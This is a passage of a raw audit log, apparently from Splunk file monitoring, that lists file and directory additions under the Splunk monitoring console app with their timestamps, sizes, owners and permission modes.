isdir=0, size=2035, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.888, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/resource_usage_deployment_extension.js", isdir=0, size=4771, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.883, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/overview_alerts_extension.js", isdir=0, size=695, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.879, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/kv_store_instance_extension.js", isdir=0, size=1314, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.876, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/kv_store_deployment_extension.js", isdir=0, size=4406, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.870, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/indexing_performance_deployment_extension.js", isdir=0, size=2218, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.867, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/indexer_clustering_status_extension.js", isdir=0, size=3089, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.863, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/index_detail_deployment_extension.js", isdir=0, size=1227, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.859, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/http_event_collector_extension.js", isdir=0, size=1256, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.855, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/forwarder_overview_extension.js", isdir=0, size=2228, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.851, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/forwarder_monitoring_extension.js", isdir=0, size=861, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.847, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/drilldown_action_extension.js", isdir=0, size=2028, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.842, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/dashboard.js", isdir=0, size=1872, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.839, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/common_control_lite.js", isdir=0, size=5127, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.835, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/common_control.js", isdir=0, size=4421, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.830, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions/cell_fill_gauge.js", isdir=0, size=7687, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.624, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/svg/SearchHead.svg", isdir=0, size=2074, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.620, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/svg/LicenseServer.svg", isdir=0, size=1541, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.617, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/svg/Indexer.svg", isdir=0, size=1750, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.613, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/svg/DeploymentServer.svg", isdir=0, size=1626, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.609, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/svg/ClusterMaster.svg", isdir=0, size=2082, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.605, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/svg/Alert.svg", isdir=0, size=2499, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.498, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/visualizations", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.494, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/views", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.488, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/util", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.484, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/svg", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.480, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.475, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/routers", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.471, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/require", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.466, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pcss", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.463, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/pages", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.459, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/models", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.454, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/mixins", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.450, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/helpers", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.447, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/fixtures", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.442, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/extensions", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.438, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/controllers", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.435, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/contrib", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.432, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/collections", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.428, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src/.eslintrc.js", isdir=0, size=67, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.324, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/models/splunk_health_check/test_task.js", isdir=0, size=11969, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.319, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/models/splunk_health_check/test_dmc_configs.js", isdir=0, size=1747, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.315, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/models/splunk_health_check/test_conductor.js", isdir=0, size=8597, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.311, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/models/splunk_health_check/test_checklist.js", isdir=0, size=13405, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.206, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/models/splunk_health_check", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.202, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/collections/splunk_health_check/test_tasks.js", isdir=0, size=7886, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.196, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/collections/splunk_health_check/test_checklists.js", isdir=0, size=2063, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.191, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/collections/test_peers.js", isdir=0, size=1509, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.185, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/collections/test_metrics.js", isdir=0, size=3394, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.180, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/collections/test_bookmarks.js", isdir=0, size=2347, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.176, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/collections/splunk_health_check", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.171, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/routers/test_monitoringconsolecheck.js", isdir=0, size=4517, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.166, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/routers/test_managementconsoleforwardersetup.js", isdir=0, size=2899, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.061, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/support/coverage-patterns.json", isdir=0, size=898, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.053, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/instances/test_instancespage.js", isdir=0, size=7565, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.046, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/forwarder_setup/enterprise/test_rebuild_assets_dialog.js", isdir=0, size=1021, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.042, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/forwarder_setup/enterprise/test_master.js", isdir=0, size=3074, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.037, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/forwarder_setup/enterprise/test_build_assets_now_dialog.js", isdir=0, size=762, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.033, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/forwarder_setup/enterprise", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:57.028, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/landing/bookmark/test_utils.es", isdir=0, size=3634, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.024, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/landing/bookmark/test_bookmark_modal.jsx", isdir=0, size=9113, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.020, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/landing/bookmark/test_bookmark.jsx", isdir=0, size=2493, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.016, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/landing/deployment_panels/test_topology_panel.jsx", isdir=0, size=1959, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.011, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/landing/deployment_panels/test_metrics_panel_modal.jsx", isdir=0, size=5855, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.008, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/landing/deployment_panels/test_metrics_panel.jsx", isdir=0, size=5612, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:57.004, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/landing/deployment_panels/test_components_panel.jsx", isdir=0, size=1936, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.898, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/landing/test_landing.jsx", isdir=0, size=2193, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.894, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/landing/test_anomalies.jsx", isdir=0, size=4318, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.890, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/landing/deployment_panels", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.886, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/landing/bookmark", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.881, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/test_download.jsx", isdir=0, size=4793, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.878, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/landing", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.874, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/instances", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.864, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views/forwarder_setup", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.860, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/views", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.857, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/support", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.851, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/routers", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.846, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/models", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.842, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/test/collections", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.738, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/visualizations/heatmap/visualization.js", isdir=0, size=413101, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.732, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/visualizations/heatmap/visualization.css", isdir=0, size=393, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.724, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/visualizations/heatmap/preview.png", isdir=0, size=15384, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.718, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/visualizations/heatmap/package.json", isdir=0, size=664, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.706, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/visualizations/heatmap/package-lock.json", isdir=0, size=711, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.700, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/visualizations/heatmap/formatter.html", isdir=0, size=2277, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.695, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/visualizations/KpiTrafficLight/components/Tooltip.js", isdir=0, size=1014, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.590, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/visualizations/KpiTrafficLight/visualization.js", isdir=0, size=11078370, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.586, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/visualizations/KpiTrafficLight/visualization.css", isdir=0, size=319, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.580, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/visualizations/KpiTrafficLight/formatter.html", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.576, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/visualizations/KpiTrafficLight/components", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.571, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/visualizations/heatmap", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.567, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/visualizations/KpiTrafficLight", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:56.563, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/enterprise/monitoringconsole_overview_preferences.js", isdir=0, size=75865, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.559, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/enterprise/monitoringconsole_overview.js", isdir=0, size=327799, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.555, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/enterprise/monitoringconsole_landing.js", isdir=0, size=1915682, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.551, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/enterprise/monitoringconsole_instances.js", isdir=0, size=46830, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.547, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/enterprise/monitoringconsole_forwarder_setup.js", isdir=0, size=56430, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.543, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/enterprise/monitoringconsole_configure.js", isdir=0, size=175466, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.540, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/enterprise/monitoringconsole_check_list.js", isdir=0, size=104463, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.537, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/enterprise/monitoringconsole_check.js", isdir=0, size=469361, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.533, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/enterprise/monitoringconsole_alerts_setup.js", isdir=0, size=120899, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.530, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/enterprise/common.js", isdir=0, size=12178895, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.424, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/lite/monitoringconsole_overview_preferences.js", isdir=0, size=75859, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.420, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/lite/monitoringconsole_overview.js", isdir=0, size=327793, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.415, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/lite/monitoringconsole_landing.js", isdir=0, size=1915676, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.411, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/lite/monitoringconsole_instances.js", isdir=0, size=46824, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.407, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/lite/monitoringconsole_forwarder_setup.js", isdir=0, size=56424, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.403, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver/static/build/pages/lite/monitoringconsole_configure.js", isdir=0, size=175460, gid=41812, uid=41812, modtime="Sat May 1 18:29:07 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:56.399, user=n/a, 